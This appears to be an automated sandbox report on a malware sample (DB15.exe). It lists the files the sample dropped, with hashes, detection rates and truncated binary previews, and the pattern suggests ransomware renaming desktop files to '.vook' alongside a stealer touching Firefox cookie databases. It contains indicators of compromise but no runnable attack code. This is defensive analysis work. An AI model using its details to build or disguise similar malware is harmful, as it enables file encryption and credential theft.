                                                                                                                                                                                                                                      SHA1:05771FF95F398547DB490222A1DE4B967EFF0983
                                                                                                                                                                                                                                      SHA-256:38F77C138B467E82DD9CA52A026EC17BCB977C6C5BCB1DEEFBAFE57EACC9BB96
                                                                                                                                                                                                                                      SHA-512:F4AD1A2771B45E8448F2B1A6AB4B7901381DD30EFCA03B1A978D6282F59FFD0A7BE833FA0215706C830D6F706D3E6CF6E9B466165DA47877966B8D24757ABD54
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....dc.....................hu.....'?............@..........................`v..............................................a..P.....u..y..............................8............................V..@............................................text...`........................... ..`.rdata..Bj.......l..................@..@.data....nt..p.......V..............@....rsrc....y....u..z...^..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1iwirbyz.pwz.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jo1srmf.mur.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxhzwlnb.sa0.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ww0ky4uv.ktz.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\bowsakkdestx.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):558
                                                                                                                                                                                                                                      Entropy (8bit):5.9641189283105875
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:YGJ68UNbNL0zG/dDnzGPCRGhvVUppYZj50/ixpZr:YgJUNb5XDHgq/iTl
                                                                                                                                                                                                                                      MD5:F045B26CB70DB6CCC8DB1535B182BF4E
                                                                                                                                                                                                                                      SHA1:A67A8EDFA7974502DC9037F1A0550582EB86C907
                                                                                                                                                                                                                                      SHA-256:06B9FE6981432C1B5E056AA233EF61AC101215043F338A4F065A8FD9ED0C3C85
                                                                                                                                                                                                                                      SHA-512:35A4BFC0970A01D820A0FDE5E85AFCF618AD27A9BA63B3BB31D9142FA793EA33A5C291D3495157DFB67EB31DD1659359B514C77EBA6DB240EC85B34113A82971
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrKK37fmeqilqo43fmLPIG+zg6ATp\/1+RCjWyBlcmgRf\\nQVbxQd5kgkJM\/qvDuoZiSU6bEtO2Gul62Y3rVW2Ry4f8yWTC80E15UtxD5x1RU10\\nOhjVMu2+nzvF4BBiTGN4wOR+KEbmXJMx8GbyX8rKpSVM4AthODhf1O7xO8LDE3A2\\nLVb+fgXtlp+KU7InK\/ykqgYGQJ7ot1T2xhbuiI2CypYEjUWj6ryIMBtYTR27kn1G\\nnslb1JL7NiXoCSEhbYxUqUv0hVuG1eZ7WqqGumf7CKjMJXZnLoyNBfWoli2qxuRX\\nfwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5"}

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):283648
                                                                                                                                                                                                                                      Entropy (8bit):6.560408763549925
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:GtcSsUDC2OZuhYRQqPY3x/OKV/LYZsTZgzENh+a1:TSsUO2cuhY1m/VYZsI
                                                                                                                                                                                                                                      MD5:8DAE8B6A6BE6E3527183594D1C26A2D3
                                                                                                                                                                                                                                      SHA1:B87E40CEE60869A36E79C88C8A3A34BAF0BC4889
                                                                                                                                                                                                                                      SHA-256:AFCE72CD3BC717C784962083066E3EDE2B0AAADBE0908EC7360096C923774FA5
                                                                                                                                                                                                                                      SHA-512:0BF065700DB647EFBA39A13A58242A595907E6C11885575CF0BDAD9E23AB40583C8A6535464E46D75D075E20D88B7A6305A761DF9DA787FDC8728483DD48F96E
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..\#.[\#.[\#.[3U.[D#.[3U [(#.[3U![{#.[U[.[W#.[\#.[7#.[3U%[]#.[3U.[]#.[3U.[]#.[Rich\#.[........................PE..L.....c..........................................@.................................'........................................\..x....................................................................S..@............................................text............................... ..`.rdata...U.......V..................@..@.data....B...p...,...N..............@....rsrc................z..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):306688
                                                                                                                                                                                                                                      Entropy (8bit):6.7250330334577075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
                                                                                                                                                                                                                                      MD5:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                                                                                                                      SHA1:1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
                                                                                                                                                                                                                                      SHA-256:FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
                                                                                                                                                                                                                                      SHA-512:CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):776192
                                                                                                                                                                                                                                      Entropy (8bit):7.532138857063051
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:JELneMTYXRD+8PgS7Xbus0kn6F0y5oIpD/8hOmzytYYQte:JqiRy8P97X+kxwoIN0hJytYdt
                                                                                                                                                                                                                                      MD5:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      SHA1:05771FF95F398547DB490222A1DE4B967EFF0983
                                                                                                                                                                                                                                      SHA-256:38F77C138B467E82DD9CA52A026EC17BCB977C6C5BCB1DEEFBAFE57EACC9BB96
                                                                                                                                                                                                                                      SHA-512:F4AD1A2771B45E8448F2B1A6AB4B7901381DD30EFCA03B1A978D6282F59FFD0A7BE833FA0215706C830D6F706D3E6CF6E9B466165DA47877966B8D24757ABD54
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....dc.....................hu.....'?............@..........................`v..............................................a..P.....u..y..............................8............................V..@............................................text...`........................... ..`.rdata..Bj.......l..................@..@.data....nt..p.......V..............@....rsrc....y....u..z...^..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\gtdirat

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):265216
                                                                                                                                                                                                                                      Entropy (8bit):5.959947496307528
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:NCEgl6HLc0iImEkhg569+wjkabBB2n2qr4j54wCxe9yFfqdwiB9ez/WnQEbK3Zk:NsUrc06Fue/kZr4j5vwbb0WWnQEbe
                                                                                                                                                                                                                                      MD5:B05A74505FA03339578DFF002BA57C69
                                                                                                                                                                                                                                      SHA1:B9851E84DBD2C8B2ECCCB30452DDCCB0496EF974
                                                                                                                                                                                                                                      SHA-256:E9839A31CCA5038608B57F6E13E75F43AA845A2F892C917A77B3C4F0BCC35C7E
                                                                                                                                                                                                                                      SHA-512:616337EFD4B6A84F0590226B52D8C7398723AFE43BB1FC879089A7474B7FD8949E16353BB4FF713DA4295DBC4885D5EB34D9483D7441B726592371BB8F285DD3
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...2[.c......................m.....'?............@...........................n.....\........................................a..P.... n..y..............................8............................V..@............................................text...`........................... ..`.rdata..Bj.......l..................@..@.data... .l..p...<...V..............@....rsrc....y... n..z..................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\gtdirat:Zone.Identifier

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                      C:\Users\user\Desktop\BNAGMGSPLO.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.841069513352159
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:DTW4XEVnRGmvK9ypXtogulwyaJprA3eVzMB34CXUfKbZGqJ19iTkbD:vTXE7JvoXjXU/6UiD
                                                                                                                                                                                                                                      MD5:2100A87F09A5E5CC89916A5AB0C253F5
                                                                                                                                                                                                                                      SHA1:BB4EDDC60F57C67B338C1768987216FF53325301
                                                                                                                                                                                                                                      SHA-256:654249FD3EFAD5A63EE48FF6137B2C7DEC9AFEF26E8983562B0219494D1EDD77
                                                                                                                                                                                                                                      SHA-512:49DDE3CBF7DF02C57A6C8835CDFE71D17A48B2CE57BFD3AD73687E33C9F5241D4D8F94F3593D3CAAE99BB688098DDA3A761D6A78B2FA97E9B4E7C75E8B79C30D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM.=......-L....?..,.6B"x....q.@..}4TT.).E...+.jT..s.U...&...(/.9.vH.yrf?.....b6\.......p....@h..j..W!.,.'.].........U3.g.nn.sEh.2.{8...m|H.m.j.. ...u...{i_..]...{..4.."3A.."*ls.m*[1`..e>t.q...Run.."7#.....Nv..Xw...q...K.<.U.3...`T^./.lE..@....y-..Q...6.2{.......C.........Q.0...{m..*Z0V.1.o....oZ..H.L.pL.unSh.....DC.*{9..n)^.Av.....n!....U6^..rw.....Jy...6B.M<H..ux..Ee..a..(.Ja!..k....].2M.i}Q........rF......T..../.Ii.c~?.'F...:~.5......t..._=..p.M...7r...'....-=5...d....Tv.... "X.....t*........i...4..CK..1..:. ........w..H..Kw..r.R....0.X.VpX.)..]..c:.n]|.w.le.}u.x..JL=.|....{h.]%.H....F.L.pQe...f.w..$..5.p.\~z.......R.C.A\..=..?.5.7.%;..R.j._...B.u..D{...$.....3rd.j3].z(.....Ha.\J2I..]w.M.....py..S.Q..o%.,..$...Bk..p.....^.U.....D<...,.o....e@P......=.D&.)........Q.3...x7S*.........;......F.C.]...?....8[.....jpb.q..g....h_`..,...K.E....<~.....%........7..E.O.,...*.E.fJ.c..x./4._....QR....Q.....Sk.:.<..:?...8.z..>S..C....e...1@.B.1

                                                                                                                                                                                                                                      C:\Users\user\Desktop\BNAGMGSPLO.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.841069513352159
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:DTW4XEVnRGmvK9ypXtogulwyaJprA3eVzMB34CXUfKbZGqJ19iTkbD:vTXE7JvoXjXU/6UiD
                                                                                                                                                                                                                                      MD5:2100A87F09A5E5CC89916A5AB0C253F5
                                                                                                                                                                                                                                      SHA1:BB4EDDC60F57C67B338C1768987216FF53325301
                                                                                                                                                                                                                                      SHA-256:654249FD3EFAD5A63EE48FF6137B2C7DEC9AFEF26E8983562B0219494D1EDD77
                                                                                                                                                                                                                                      SHA-512:49DDE3CBF7DF02C57A6C8835CDFE71D17A48B2CE57BFD3AD73687E33C9F5241D4D8F94F3593D3CAAE99BB688098DDA3A761D6A78B2FA97E9B4E7C75E8B79C30D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM.=......-L....?..,.6B"x....q.@..}4TT.).E...+.jT..s.U...&...(/.9.vH.yrf?.....b6\.......p....@h..j..W!.,.'.].........U3.g.nn.sEh.2.{8...m|H.m.j.. ...u...{i_..]...{..4.."3A.."*ls.m*[1`..e>t.q...Run.."7#.....Nv..Xw...q...K.<.U.3...`T^./.lE..@....y-..Q...6.2{.......C.........Q.0...{m..*Z0V.1.o....oZ..H.L.pL.unSh.....DC.*{9..n)^.Av.....n!....U6^..rw.....Jy...6B.M<H..ux..Ee..a..(.Ja!..k....].2M.i}Q........rF......T..../.Ii.c~?.'F...:~.5......t..._=..p.M...7r...'....-=5...d....Tv.... "X.....t*........i...4..CK..1..:. ........w..H..Kw..r.R....0.X.VpX.)..]..c:.n]|.w.le.}u.x..JL=.|....{h.]%.H....F.L.pQe...f.w..$..5.p.\~z.......R.C.A\..=..?.5.7.%;..R.j._...B.u..D{...$.....3rd.j3].z(.....Ha.\J2I..]w.M.....py..S.Q..o%.,..$...Bk..p.....^.U.....D<...,.o....e@P......=.D&.)........Q.3...x7S*.........;......F.C.]...?....8[.....jpb.q..g....h_`..,...K.E....<~.....%........7..E.O.,...*.E.fJ.c..x./4._....QR....Q.....Sk.:.<..:?...8.z..>S..C....e...1@.B.1

                                                                                                                                                                                                                                      C:\Users\user\Desktop\EOWRVPQCCS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843266336036324
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:A/dtj2AOhEUgyDfh+iE69Iv61bK/RRtJfI+rUV6JIZUnT6sQCmioQiEcGViTkbD:A/fyzhE9v7RHJlrUUeUn2sQC4QiEoiD
                                                                                                                                                                                                                                      MD5:DF0B05244C0C44B32DB016C400B368A4
                                                                                                                                                                                                                                      SHA1:F8504E43262708C77EFB846075F7D6B61A655992
                                                                                                                                                                                                                                      SHA-256:3302CA6DB6F93D8B585D086386223CBBE8F3E11A85D8A9B35CD566A03C3675E9
                                                                                                                                                                                                                                      SHA-512:31CBF22102CFBE258211E651D11AF46662424C95928256AB73B436C524C53E33D1C9E39526D777A71276232959E8C59305770878469A8B616A91E6423D42C951
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:EOWRV..N.....J>.=......G...D..i..!...x.vo...Bk.D.....';D.Q........].O..P.b2.B.!.N...z.....+..(ds........|..OZ.b....<P..P......j9.}.h..t{..a.X8t.x..0.-O>.0..g^...( ......n...ro`.3.k.S..D. ?...]..0..^|N..Y\.|.............Z.8....J...D.|..qNe.{.L?.t........Q...VW.d......T..\^.....#.JR0%N2.Lb...a.0..F..e.'."..@Y8#.....Q.f0k../.....!(..$..A..3......!...G,=.....+.p.O.k....@.3.7wp....\..j....7O.$0<.....K.Ub..Z......y$.C....c.V7....\zT.....S....LY.I#ar...o........iY......NK......y.Be..%....p.2s.....=.w.G......QHp.d......kG.Q.k...z...N.q.6.|r.ow..zl".;hN.PQ.y.c'..._..`9.E..X.S.w..x[..H.O...r9.)*.].L$......y...2..............V.w.7...Z+pf..La..w.O..V....Z...a..,....n....-...V.....(.PLBZ.8v...%F'..h.~..;O._.N.....0G|../__...ih9.Vd-.{ ........u...nf..yI;.^Y.)$.!..0...sT.8R&..U.q.2H.3wO.k.E...pt..Rb.a.'..G ...@0:.k...v..l.I./}..........P.yST..k........@?..3..W."A,..\.......G!.\C..+.R.~u.S....e.....0...B..4.QqK.h...].ZT|...t%Xi*......._.........

                                                                                                                                                                                                                                      C:\Users\user\Desktop\EOWRVPQCCS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843266336036324
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:A/dtj2AOhEUgyDfh+iE69Iv61bK/RRtJfI+rUV6JIZUnT6sQCmioQiEcGViTkbD:A/fyzhE9v7RHJlrUUeUn2sQC4QiEoiD
                                                                                                                                                                                                                                      MD5:DF0B05244C0C44B32DB016C400B368A4
                                                                                                                                                                                                                                      SHA1:F8504E43262708C77EFB846075F7D6B61A655992
                                                                                                                                                                                                                                      SHA-256:3302CA6DB6F93D8B585D086386223CBBE8F3E11A85D8A9B35CD566A03C3675E9
                                                                                                                                                                                                                                      SHA-512:31CBF22102CFBE258211E651D11AF46662424C95928256AB73B436C524C53E33D1C9E39526D777A71276232959E8C59305770878469A8B616A91E6423D42C951
                                                                                                                                                                                                                                      Malicious:false
